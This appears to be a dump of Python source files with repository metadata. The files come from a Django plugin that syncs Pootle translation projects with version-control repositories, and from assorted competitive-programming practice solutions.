language=self.language)\n\n @property\n def directory(self):\n directory = self.translation_project.directory\n if self.directory_path:\n for subdir in self.directory_path.split(\"/\"):\n (directory,\n created) = directory.child_dirs.get_or_create(name=subdir)\n return directory\n\n @property\n def store(self):\n store, created = Store.objects.get_or_create(\n parent=self.directory,\n translation_project=self.translation_project,\n name=self.filename)\n if created:\n store.save()\n return store\n\n @property\n def store_vcs(self):\n from pootle_vcs.models import StoreVCS\n store_vcs, created = StoreVCS.objects.get_or_create(\n store=self.store, path=self.path)\n return store_vcs\n\n @property\n def latest_commit(self):\n raise NotImplementedError\n\n def fetch(self):\n return self.store_vcs\n\n def pull(self):\n with open(self.file_path) as f:\n import_file(\n f,\n pootle_path=self.pootle_path,\n rev=self.store.get_max_unit_revision())\n store_vcs = self.store_vcs\n store_vcs.last_sync_commit = self.latest_commit\n store_vcs.last_sync_revision = self.store.get_max_unit_revision()\n store_vcs.save()\n\n def read(self):\n # self.vcs.pull()\n with open(self.file_path) as f:\n return f.read()\n" }, { "alpha_fraction": 0.5356613993644714, "alphanum_fraction": 0.5356613993644714, "avg_line_length": 28.716981887817383, "blob_id": "ede605ee357e5bc1ac2fc59c62577fb0adc9e749", "content_id": "b824b157d9ae3ee5859fd19da103bc3b93868829", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4725, "license_type": "no_license", "max_line_length": 78, "num_lines": 159, "path": "/pootle_vcs/plugins.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "import io\nimport logging\nimport os\nfrom ConfigParser import ConfigParser\n\nfrom pootle_language.models import Language\nfrom pootle_store.models import Store\n\nfrom .files import RepositoryFile\nfrom .finder import TranslationFileFinder\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Plugin(object):\n name = None\n file_class = RepositoryFile\n\n def __init__(self, vcs):\n self.vcs = vcs\n\n @property\n def is_cloned(self):\n if os.path.exists(self.local_repo_path):\n return True\n return False\n\n @property\n def local_repo_path(self):\n vcs_path = \"/tmp\"\n return os.path.join(vcs_path, self.vcs.project.code)\n\n @property\n def project(self):\n return self.vcs.project\n\n @property\n def stores(self):\n return Store.objects.filter(\n translation_project__project=self.project)\n\n @property\n def translation_files(self):\n from .models import StoreVCS\n return StoreVCS.objects.filter(\n store__translation_project__project=self.project)\n\n def fetch_translation_files(self):\n for repo_file in self.find_translation_files():\n repo_file.fetch()\n\n def find_translation_files(self):\n config = self.read_config()\n\n for section in config.sections():\n if section == \"default\":\n section_subdirs = []\n else:\n section_subdirs = section.split(\"/\")\n\n finder = TranslationFileFinder(\n os.path.join(\n self.local_repo_path,\n config.get(section, \"translation_path\")))\n for file_path, matched in finder.find():\n lang_code = matched['lang']\n try:\n language = Language.objects.get(code=lang_code)\n except Language.DoesNotExist:\n logger.warning(\n \"Language does not exist for %s: %s\"\n % (self.vcs, lang_code))\n subdirs = (\n section_subdirs\n + [m for m in\n matched.get('directory_path', '').strip(\"/\").split(\"/\")\n if m])\n filename = (\n matched.get(\"filename\") or os.path.basename(file_path))\n yield self.file_class(\n self.vcs,\n file_path.replace(self.local_repo_path, \"\"),\n language,\n filename,\n subdirs)\n\n def pull_translation_files(self):\n for repo_file in self.find_translation_files():\n repo_file.pull()\n\n def pull(self):\n raise NotImplementedError\n\n def push(self):\n raise NotImplementedError\n\n def read(self, path):\n target = os.path.join(self.local_repo_path, path)\n with open(target) as f:\n content = f.read()\n return content\n\n def read_config(self):\n self.pull()\n config = ConfigParser()\n config.readfp(io.BytesIO(self.read(self.vcs.pootle_config)))\n return config\n\n def status(self):\n self.pull()\n status = dict(\n CONFLICT=[],\n VCS_ADDED=[],\n VCS_AHEAD=[],\n POOTLE_AHEAD=[])\n\n for store_vcs in self.translation_files:\n repo_file = store_vcs.repository_file\n repo_removed = not repo_file.exists\n repo_added = (\n store_vcs.last_sync_commit is None)\n repo_changed = (\n store_vcs.last_sync_commit is not None\n and (repo_file.latest_commit\n != store_vcs.last_sync_commit))\n pootle_changed = (\n store_vcs.last_sync_commit is not None\n and (store_vcs.store.get_max_unit_revision()\n != store_vcs.last_sync_revision))\n if repo_removed:\n status['VCS_REMOVED'].append(store_vcs)\n elif repo_added:\n status['VCS_ADDED'].append(store_vcs)\n elif repo_changed and pootle_changed:\n status['CONFLICT'].append(store_vcs)\n elif repo_changed:\n status['VCS_AHEAD'].append(store_vcs)\n elif pootle_changed:\n status['POOTLE_AHEAD'].append(store_vcs)\n\n status['POOTLE_ADDED'] = self.stores.filter(vcs__isnull=True)\n\n return status\n\n\nclass Plugins(object):\n\n def __init__(self):\n self.__plugins__ = {}\n\n def register(self, plugin):\n self.__plugins__[plugin.name] = plugin\n\n def __getitem__(self, k):\n return self.__plugins__[k]\n\n def __contains__(self, k):\n return k in self.__plugins__\n" }, { "alpha_fraction": 0.67463618516922, "alphanum_fraction": 0.6767151951789856, "avg_line_length": 39.08333206176758, "blob_id": "7a6b336c22131f600285e60f89951937b683b96a", "content_id": "171179d05f053e4ec0d5e950891f41c0009a74e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 962, "license_type": "no_license", "max_line_length": 77, "num_lines": 24, "path": "/pootle_vcs/management/commands/vcs_commands/info.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) Pootle contributors.\n#\n# This file is a part of the Pootle project. It is distributed under the GPL3\n# or later license. See the LICENSE file for a copy of the license and the\n# AUTHORS file for copyright and authorship information.\n\nfrom pootle_vcs.management.commands import SubCommand\n\n\nclass ProjectInfoCommand(SubCommand):\n help = \"List VCS translations files managed by Pootle.\"\n\n def handle(self, project, *args, **options):\n vcs = self.get_vcs(project)\n self.stdout.write(\"Project: %s\" % project.code)\n self.stdout.write(\"type: %s\" % vcs.vcs_type)\n self.stdout.write(\"URL: %s\" % vcs.url)\n self.stdout.write(\"enabled: %s\" % vcs.enabled)\n self.stdout.write(\"latest commit: %s\" % vcs.get_latest_commit())\n self.stdout.write(\"fetch frequency: %s\" % vcs.fetch_frequency)\n self.stdout.write(\"push frequency: %s\" % vcs.push_frequency)\n" }, { "alpha_fraction": 0.6286388635635376, "alphanum_fraction": 0.6302124261856079, "avg_line_length": 32.01298522949219, "blob_id": "17d044e284cb10857155971992015d3d4b8ec48e", "content_id": "f1eab6858bb8228655542ddbc2d10c6940451b6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2542, "license_type": "no_license", "max_line_length": 77, "num_lines": 77, "path": "/pootle_vcs/management/commands/vcs.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) Pootle contributors.\n#\n# This file is a part of the Pootle project. It is distributed under the GPL3\n# or later license. See the LICENSE file for a copy of the license and the\n# AUTHORS file for copyright and authorship information.\n\nimport logging\nimport os\nfrom optparse import NO_DEFAULT\n\n# This must be run before importing Django.\nos.environ['DJANGO_SETTINGS_MODULE'] = 'pootle.settings'\n\nfrom django.core.management.base import BaseCommand, CommandError\n\nfrom pootle_project.models import Project\n\nfrom pootle_vcs.models import ProjectVCS\n\nfrom .vcs_commands.info import ProjectInfoCommand\nfrom .vcs_commands.fetch_translations import FetchTranslationsCommand\nfrom .vcs_commands.files import FilesCommand\nfrom .vcs_commands.pull_translations import PullTranslationsCommand\nfrom .vcs_commands.set_vcs import SetVCSCommand\nfrom .vcs_commands.status import StatusCommand\n\n\nlogger = logging.getLogger('pootle.vcs')\n\n\nclass Command(BaseCommand):\n help = \"Pootle VCS.\"\n subcommands = {\n \"info\": ProjectInfoCommand,\n \"fetch_translations\": FetchTranslationsCommand,\n \"files\": FilesCommand,\n \"pull_translations\": PullTranslationsCommand,\n \"set_vcs\": SetVCSCommand,\n \"status\": StatusCommand}\n\n def handle_subcommand(self, project, command, *args, **options):\n try:\n subcommand = self.subcommands[command]()\n except KeyError:\n raise CommandError(\"Unrecognised command: %s\" % command)\n defaults = {}\n for opt in subcommand.option_list:\n if opt.default is NO_DEFAULT:\n defaults[opt.dest] = None\n else:\n defaults[opt.dest] = opt.default\n defaults.update(options)\n return subcommand.execute(project, *args, **defaults)\n\n def handle(self, *args, **kwargs):\n if args:\n project_code = args[0]\n args = args[1:]\n try:\n project = Project.objects.get(code=project_code)\n except Project.DoesNotExist:\n project = None\n\n if project:\n return self.handle_subcommand(\n project, *(args or ['info']), **kwargs)\n else:\n for project in Project.objects.all():\n try:\n self.stdout.write(\n \"%s\\t%s\"\n % (project.code, project.vcs.get().url))\n except ProjectVCS.DoesNotExist:\n pass\n" }, { "alpha_fraction": 0.6461684107780457, "alphanum_fraction": 0.652790904045105, "avg_line_length": 28.36111068725586, "blob_id": "2ea30202ff00928afcdcfe831a5882195d50b52c", "content_id": "c13b9b48210b28f21010880c8d41cc5701284e26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1057, "license_type": "no_license", "max_line_length": 77, "num_lines": 36, "path": "/pootle_vcs/management/commands/vcs_commands/set_vcs.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) Pootle contributors.\n#\n# This file is a part of the Pootle project. It is distributed under the GPL3\n# or later license. See the LICENSE file for a copy of the license and the\n# AUTHORS file for copyright and authorship information.\n\nfrom django.core.management.base import CommandError\n\nfrom pootle_vcs import plugins\nfrom pootle_vcs.management.commands import SubCommand\nfrom pootle_vcs.models import ProjectVCS\n\n\nclass SetVCSCommand(SubCommand):\n help = \"Status of vcs repositories.\"\n\n def handle(self, project, *args, **options):\n if not args or not len(args) == 2:\n raise CommandError(\"You must a VCS type and VCS url\")\n\n try:\n plugins[args[0]]\n except KeyError:\n raise CommandError(\"Unrecognised VCS type: %s\" % args[0])\n\n try:\n vcs = project.vcs.get()\n except ProjectVCS.DoesNotExist:\n vcs = project.vcs.create()\n\n vcs.vcs_type = args[0]\n vcs.url = args[1]\n vcs.save()\n" }, { "alpha_fraction": 0.6036866307258606, "alphanum_fraction": 0.6082949042320251, "avg_line_length": 17.08333396911621, "blob_id": "a89b3bb8f4c356aeefbfadbb0f51da654cb1c57f", "content_id": "5c2e4478bd7cf6085b0571ec175d5f61acb91f8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 217, "license_type": "no_license", "max_line_length": 46, "num_lines": 12, "path": "/pootle_vcs/schedule.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "import django_rq\nimport datetime\n\n\ndef func():\n print \"Boom!\"\n\n\nscheduler = django_rq.get_scheduler('default')\nscheduler.schedule(datetime.datetime.utcnow(),\n func,\n interval=5)\n" }, { "alpha_fraction": 0.7311828136444092, "alphanum_fraction": 0.7347670197486877, "avg_line_length": 31.823530197143555, "blob_id": "34e9b36df459f5d15bdba997f6c6b3af1b821e36", "content_id": "2390aed7e3946bb1682ac0cc69e85f741ea82670", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 558, "license_type": "no_license", "max_line_length": 77, "num_lines": 17, "path": "/pootle_vcs/management/commands/vcs_commands/fetch_translations.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) Pootle contributors.\n#\n# This file is a part of the Pootle project. It is distributed under the GPL3\n# or later license. See the LICENSE file for a copy of the license and the\n# AUTHORS file for copyright and authorship information.\n\nfrom pootle_vcs.management.commands import SubCommand\n\n\nclass FetchTranslationsCommand(SubCommand):\n help = \"Fetch translations into Pootle from VCS.\"\n\n def handle(self, project, *args, **options):\n self.get_vcs(project).fetch_translation_files()\n" }, { "alpha_fraction": 0.7948718070983887, "alphanum_fraction": 0.7948718070983887, "avg_line_length": 22.399999618530273, "blob_id": "71d8f52ea0d8d41aab7b0984a808365b53934b79", "content_id": "99ba1427a312e813494ab9f5c881d600da748896", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 117, "license_type": "no_license", "max_line_length": 36, "num_lines": 5, "path": "/pootle_vcs/__init__.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "from .plugins import Plugins, Plugin\nfrom .files import RepositoryFile\n(Plugin, RepositoryFile)\n\nplugins = Plugins()\n" }, { "alpha_fraction": 0.5651214122772217, "alphanum_fraction": 0.5805739760398865, "avg_line_length": 21.649999618530273, "blob_id": "db2ccf5663038dc894b60c9d2ef24755f061940b", "content_id": "f4ccfb7afaee40102b9e3e6a44d62ca080caf004", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 453, "license_type": "no_license", "max_line_length": 65, "num_lines": 20, "path": "/pootle_vcs/migrations/0002_projectvcs_project_type.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('pootle_vcs', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='projectvcs',\n name='project_type',\n field=models.CharField(default='git', max_length=32),\n preserve_default=False,\n ),\n ]\n" }, { "alpha_fraction": 0.5067650675773621, "alphanum_fraction": 0.5161951780319214, "avg_line_length": 37.109375, "blob_id": "2a533a7fe31b5a132a958199dec28b3a9031e850", "content_id": "8695bd3aaa1671ceb030c140b33bd2363d0f4abd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2439, "license_type": "no_license", "max_line_length": 77, "num_lines": 64, "path": "/pootle_vcs/management/commands/vcs_commands/status.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) Pootle contributors.\n#\n# This file is a part of the Pootle project. It is distributed under the GPL3\n# or later license. See the LICENSE file for a copy of the license and the\n# AUTHORS file for copyright and authorship information.\n\nfrom pootle_vcs.models import ProjectVCS\n\nfrom pootle_vcs.management.commands import SubCommand\n\n\nclass StatusCommand(SubCommand):\n help = \"Status of vcs repositories.\"\n\n def handle(self, project, *args, **options):\n try:\n vcs = project.vcs.get()\n except ProjectVCS.DoesNotExist:\n vcs = None\n status = vcs.status()\n synced = (\n not status['CONFLICT']\n and not status['POOTLE_AHEAD']\n and not status['POOTLE_ADDED']\n and not status['VCS_ADDED']\n and not status['VCS_AHEAD'])\n if synced:\n self.stdout.write(\"Everything up-to-date\")\n return\n if status[\"CONFLICT\"]:\n self.stdout.write(\"Both changed:\")\n for repo_file in status[\"CONFLICT\"]:\n self.stdout.write(repo_file)\n if status[\"POOTLE_ADDED\"]:\n for store in status[\"POOTLE_ADDED\"]:\n self.stdout.write(\n \" %-50s %-50s %-20s\\n\"\n % (\"\", store.pootle_path,\n \"Pootle added: %s\" % store.get_max_unit_revision()))\n if status[\"POOTLE_AHEAD\"]:\n self.stdout.write(\"Pootle changed:\")\n for repo_file in status[\"POOTLE_AHEAD\"]:\n self.stdout.write(repo_file)\n if status[\"VCS_ADDED\"]:\n for store_vcs in status[\"VCS_ADDED\"]:\n self.stdout.write(\n \" %-50s %-50s %-10s\\n\"\n % (store_vcs.path,\n store_vcs.store.pootle_path,\n \"VCS added: %s\"\n % store_vcs.repository_file.latest_commit[:8]))\n if status[\"VCS_AHEAD\"]:\n for store_vcs in status[\"VCS_AHEAD\"]:\n self.stdout.write(\n \" %-50s %-50s %-20s\\n\"\n % (store_vcs.path,\n store_vcs.store.pootle_path,\n \"VCS updated: %s...%s\"\n % (store_vcs.last_sync_commit[:8],\n store_vcs.repository_file.latest_commit[:8])))\n self.stdout.write(\"\\n\")\n" }, { "alpha_fraction": 0.6081677675247192, "alphanum_fraction": 0.620309054851532, "avg_line_length": 35.2400016784668, "blob_id": "2d86f4310e3ee64dc2a55eebafe3366ef5b514e9", "content_id": "602aa3191341364dcbd898a0e9c9bfad002c28c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 906, "license_type": "no_license", "max_line_length": 77, "num_lines": 25, "path": "/pootle_vcs/management/commands/vcs_commands/files.py", "repo_name": "phlax/pootle_vcs", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (C) Pootle contributors.\n#\n# This file is a part of the Pootle project. It is distributed under the GPL3\n# or later license. See the LICENSE file for a copy of the license and the\n# AUTHORS file for copyright and authorship information.\n\nfrom pootle_vcs.management.commands import SubCommand\n\n\nclass FilesCommand(SubCommand):\n help = \"List VCS translations files managed by Pootle.\"\n\n def handle(self, project, *args, **options):\n vcs = self.get_vcs(project)\n files = vcs.list_translation_files()\n for store_vcs in files.order_by(\"path\").iterator():\n self.stdout.write(\n \" %-50s %-50s %-12s %-12s \\n\"\n % (store_vcs.path,\n store_vcs.store.pootle_path,\n store_vcs.last_sync_revision,\n (store_vcs.last_sync_commit or '')[:8]))\n" } ]
19
Onedas/coding_test_practice
https://github.com/Onedas/coding_test_practice
e43bcdec328f9f5a6c0a5119ad41b0bcd23fe413
e033e9ff7ce0a49a99291956fc0b4328898d4ea5
544e30bf8ee8a28047efe34456da65fd9fa200c5
refs/heads/master
2020-08-22T19:13:25.897809
2020-07-09T12:16:45
2020-07-09T12:16:45
216,463,229
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5163636207580566, "alphanum_fraction": 0.5381818413734436, "avg_line_length": 14.222222328186035, "blob_id": "6f706a43f8a55ea1cff224ab58f0b87749ca96bb", "content_id": "3edd4784ae11b4b3e67a933aa76296678bf4afe9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 275, "license_type": "no_license", "max_line_length": 43, "num_lines": 18, "path": "/백준/GCD 합_9613.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def gcd(a,b):\n\twhile b!=0:\n\t\tr = a%b\n\t\ta = b\n\t\tb = r\n\treturn a\n\nT = int(input())\nfor t in range(T):\n\ttest_case = list(map(int,input().split()))\n\tn = test_case[0]\n\tnums = test_case[1:]\n\n\tS = 0\n\tfor i,a in enumerate(nums[:-1]):\n\t\tfor b in nums[i+1:]:\n\t\t\tS+=gcd(a,b)\n\tprint(S)\n\n" }, { "alpha_fraction": 0.37051039934158325, "alphanum_fraction": 0.43667295575141907, "avg_line_length": 20.15999984741211, "blob_id": "dfe82e5c49cc2b268acfa6dae661329ba2e9f27f", "content_id": "9f4f5789944b44b7e2a6645acfaf093f3545ddca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 529, "license_type": "no_license", "max_line_length": 48, "num_lines": 25, "path": "/kakao/체육복.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(n,lost,reserve):\n answer=0\n\n li=[1 if n>=i>0 else -1 for i in range(n+2)]\n for i in lost:\n li[i]-=1\n for i in reserve:\n li[i]+=1\n\n for i in range(n+1):\n if li[i]==0:\n if li[i-1]==2:\n li[i-1]=1\n li[i]=1\n elif li[i+1]==2:\n li[i+1]=1\n li[i]=1\n\n answer = sum([1 if x>0 else 0 for x in li])\n return answer\n\n\nprint(solution(5,[2,4],[1,3,5]))\nprint(solution(5,[2,4],[3]))\nprint(solution(3,[3],[1]))\n" }, { "alpha_fraction": 0.35865503549575806, "alphanum_fraction": 0.5660024881362915, "avg_line_length": 31.1200008392334, "blob_id": "65d50d2f9b7b2ddb56fda877d76edef57c638da9", "content_id": "d0992112f2eaab28d620f7288bf913742dcbf445", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1658, "license_type": "no_license", "max_line_length": 346, "num_lines": 50, "path": "/kakao/추석 트레픽_ 틀림 ㅠ.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(lines):\n answer=0\n timeline=[]\n checktime=[]\n for line in lines:\n line=line.lstrip()\n line=line.split(' ')\n dur=float(line[2].replace('s',''))*1000\n HH=int(line[1][0:2])*24*60*1000\n MM=int(line[1][3:5])*60*1000\n SS=float(line[1][6:])*1000\n time=HH+MM+SS\n start_t=time-dur+1\n\n timeline.append((int(start_t),int(time)))\n checktime.append(start_t)\n checktime.append(time-1)\n\n for check_t in checktime:\n count=0\n for log in timeline:\n if is_exist(log,check_t):\n count+=1\n\n if answer < count:\n answer=count\n\n return answer\n\ndef is_exist(log, checktime):\n state=False\n if log[0]<=checktime<log[1]:\n state=True\n if log[0]<=checktime+999<log[1]:\n state=True\n if checktime<=log[0]<log[1]<=checktime+999:\n state=True\n if log[0]<=checktime and checktime+999<=log[1]:\n state=True\n\n return state\n\n\n\nif __name__==\"__main__\":\n # lines=['2016-09-15 01:00:04.001 2.0s', '2016-09-15 01:00:07.000 2s']\n lines='“2016-09-15 20:59:57.421 0.351s”, “2016-09-15 20:59:58.233 1.181s”, “2016-09-15 20:59:58.299 0.8s”, “2016-09-15 20:59:58.688 1.041s”, “2016-09-15 20:59:59.591 1.412s”, “2016-09-15 21:00:00.464 1.466s”, “2016-09-15 21:00:00.741 1.581s”, “2016-09-15 21:00:00.748 2.31s”, “2016-09-15 21:00:00.966 0.381s”, “2016-09-15 21:00:02.066 2.62s”'\n # lines='“2016-09-15 01:00:04.002 2.0s”, “2016-09-15 01:00:07.000 2s”'\n lines=lines.replace('“','').replace('”','').split(',')\n print(solution(lines))\n" }, { "alpha_fraction": 0.4337349534034729, "alphanum_fraction": 0.4859437644481659, "avg_line_length": 15.096774101257324, "blob_id": "5dd5ccc60ba3a1240a3ec9e18926fd8b73b5cbd8", "content_id": "4321ca1d0a7f8ef3a27579dd95c8a29f9cee6410", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 498, "license_type": "no_license", "max_line_length": 39, "num_lines": 31, "path": "/백준/10971.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "n = int(input())\nm= []\nfor _ in range(n):\n m.append(map(int,input().split()))\n#\n# n=4\n# m=[[0, 10, 15, 20],\n# [5, 0, 9, 10],\n# [6, 13, 0, 12],\n# [8, 8, 9, 0]\n# ]\n\nanswer=float('inf')\n\nimport itertools as it\npaths = list(it.permutations(range(n)))\n\nfor p in paths:\n start_p = list(p[:])\n end_p = list(p[1:])+ [p[0],]\n\n cal=0\n for i,j in zip(start_p,end_p):\n cal+=m[i][j]\n if cal>answer:\n break\n\n if cal<answer:\n answer=cal\n\nprint(answer)" }, { "alpha_fraction": 0.492803692817688, "alphanum_fraction": 0.5164076089859009, "avg_line_length": 21, "blob_id": "046e479549ff78775ba64214f353cb424f01753f", "content_id": "db61a2ecb0d6e689fab2497c87ace34048382c1c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1739, "license_type": "no_license", "max_line_length": 51, "num_lines": 79, "path": "/백준/14500_2.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "import sys\ninput=sys.stdin.readline\nrow, col= map(int,input().split())\nM=[]\nfor r in range(row):\n M.append(list(map(int,input().split())))\n\nanswer=0\ndef bar(x,y):\n global answer\n s=0\n if x<=row-4: #l\n s=M[x][y]+M[x+1][y]+M[x+2][y]+M[x+3][y]\n\n answer=max(s,answer)\n\ndef square(x,y):\n global answer\n s=0\n if x<=row-2 and y<=col-2: #ㅁ\n s=M[x][y]+M[x+1][y]+M[x][y+1]+M[x+1][y+1]\n answer = max(s,answer)\n\ndef L_shape(x,y):\n global answer\n s=0\n if x<=row-3 and y<=col-2:\n s=M[x][y]+M[x+1][y]+M[x+2][y]+M[x+2][y+1]\n answer= max(s,answer)\n\ndef Z_shape(x,y):\n global answer\n s=0\n if x<=row-3 and y<=col-2:\n s=M[x][y]+M[x+1][y]+M[x+1][y+1]+M[x+2][y+1]\n answer = max(s, answer)\n\ndef T_shape(x,y):\n global answer\n s=0\n if x<=row-2 and y<=col-3:\n s=M[x][y]+M[x][y+1]+M[x+1][y+1]+M[x][y+2]\n answer=max(s,answer)\n\ndef RotateMap_clockwise(row,col,M):\n new_map=[[0]*row for _ in range(col)]\n for i in range(row):\n for j in range(col):\n new_map[j][row-1-i]=M[i][j]\n\n return col,row,new_map\n\ndef FilpMap(row,col,M):\n new_map=[[0]*col for _ in range(row)]\n for i in range(row):\n for j in range(col):\n new_map[row-1-i][j]=M[i][j]\n return row,col,new_map\n\n\nfor _ in range(4):\n for i in range(row):\n for j in range(col):\n bar(i,j)\n square(i,j)\n L_shape(i,j)\n Z_shape(i,j)\n T_shape(i,j)\n row,col,M=RotateMap_clockwise(row,col,M)\n\nrow,col,M=FilpMap(row,col,M)\nfor _ in range(4):\n for i in range(row):\n for j in range(col):\n L_shape(i,j)\n Z_shape(i,j)\n row,col,M=RotateMap_clockwise(row,col,M)\n\nprint(answer)" }, { "alpha_fraction": 0.6147058606147766, "alphanum_fraction": 0.6323529481887817, "avg_line_length": 14.5, "blob_id": "260e2ea895b3d860d0d41694835283ee361e0455", "content_id": "32470487eed63e7e99112d32509d7284c1554925", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 340, "license_type": "no_license", "max_line_length": 29, "num_lines": 22, "path": "/백준/일곱 난쟁이_2309.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "dwarfs = []\nfor _ in range(9):\n\tdwarfs.append(int(input()))\n\ndwarfs.sort()\nrest = sum(dwarfs) - 100\n\nno_dwarf = []\nfor i,a in enumerate(dwarfs):\n\tif len(no_dwarf)==2:\n\t\tbreak\n\n\tfor b in dwarfs[i+1:]:\n\t\tif a+b == rest:\n\t\t\tno_dwarf.append(a)\n\t\t\tno_dwarf.append(b)\n\t\t\tbreak\n\nfor dwarf in dwarfs:\n\tif dwarf in no_dwarf:\n\t\tcontinue\n\tprint(dwarf)" }, { "alpha_fraction": 0.6238095164299011, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 18.18181800842285, "blob_id": "7ceba92a3d0d151eb110b66bc4d904994c7bdcd9", "content_id": "72bb2509d4e92e0196e1ba29f89223c02f7d672f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 210, "license_type": "no_license", "max_line_length": 58, "num_lines": 11, "path": "/백준/1, 2, 3 더하기_9095.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def onetwothree(n):\n\tif n==1:\n\t\treturn 1\n\telif n==2:\n\t\treturn 2\n\telif n==3:\n\t\treturn 4\n\treturn onetwothree(n-3)+onetwothree(n-2)+onetwothree(n-1)\n\nfor t in range(int(input())):\n\tprint(onetwothree(int(input())))" }, { "alpha_fraction": 0.3976608216762543, "alphanum_fraction": 0.4181286692619324, "avg_line_length": 20.061538696289062, "blob_id": "188a15f4b87bf3a057af4db60688b0a85bee2bbe", "content_id": "d2f950625bb98d22677770c94065754ff37a083e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1368, "license_type": "no_license", "max_line_length": 57, "num_lines": 65, "path": "/python/2048.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "from sys import stdin\ninput = stdin.readline\nfrom collections import deque\n\n\nsize = int(input())\nm = [list(map(int,input().split())) for _ in range(size)]\nans=0\nq = deque()\n\ndef get(i,j):\n if m[i][j]:\n q.append(m[i][j])\n m[i][j]=0\n\ndef merge(i,j,di,dj):\n while q:\n x=q.popleft()\n if not m[i][j]:\n m[i][j] = x\n elif m[i][j] == x:\n m[i][j] = 2*x\n i,j= i+di, j+dj\n else:\n i,j= i+di, j+dj\n m[i][j] = x\n\ndef move(k):\n if k==0:\n for j in range(size):\n for i in range(size):\n get(i,j)\n merge(0,j,1,0)\n elif k==1:\n for j in range(size):\n for i in range(size-1, -1, -1):\n get(i,j)\n merge(size-1,j,-1,0)\n elif k==2:\n for i in range(size):\n for j in range(size):\n get(i,j)\n merge(i,0,0,1)\n\n else:\n for i in range(size):\n for j in range(size-1, -1, -1):\n get(i,j)\n merge(i, size-1, 0, -1)\n\ndef solve(cnt):\n global m, ans\n if cnt ==5:\n for i in range(size):\n ans= max(ans, max(m[i]))\n return\n b=[x[:] for x in m]\n for k in range(4):\n move(k)\n solve(cnt+1)\n m=[x[:] for x in b]\n\nif __name__ == \"__main__\":\n solve(0)\n print(ans)" }, { "alpha_fraction": 0.5539215803146362, "alphanum_fraction": 0.5833333134651184, "avg_line_length": 16.08333396911621, "blob_id": "dec1b4f6a58674c62d1d5ca605632d75a1510ccf", "content_id": "da9cdd5b0501ed5054ad920248318d307764f0df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 204, "license_type": "no_license", "max_line_length": 35, "num_lines": 12, "path": "/백준/N과 M3_15651.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "N,M = map(int,input().split())\n\ndef re(count, visited):\n\tif count == M:\n\t\tprint(' '.join(map(str,visited)))\n\t\treturn\n\n\tfor i in range(1,N+1):\n\t\tre(count+1, visited+[i])\n\nfor i in range(1,N+1):\n\tre(1, [i])" }, { "alpha_fraction": 0.5222222208976746, "alphanum_fraction": 0.5333333611488342, "avg_line_length": 13.5, "blob_id": "7764c0dd2686bf2c53f301bf9411b3aa10555df7", "content_id": "326b1a292f351ec781599c5d0f75a8d2277bce01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 90, "license_type": "no_license", "max_line_length": 18, "num_lines": 6, "path": "/백준/차이를 최대로_10819.py", "repo_name": "Onedas/coding_test_practice", 